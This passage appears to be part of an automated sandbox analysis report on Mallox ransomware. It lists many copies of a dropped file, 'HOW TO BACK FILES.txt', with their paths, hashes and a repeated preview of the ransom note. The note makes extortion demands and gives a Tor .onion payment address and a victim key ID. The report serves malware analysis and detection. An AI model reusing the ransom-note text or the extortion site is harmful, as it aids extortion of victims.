                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\AC\Temp\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
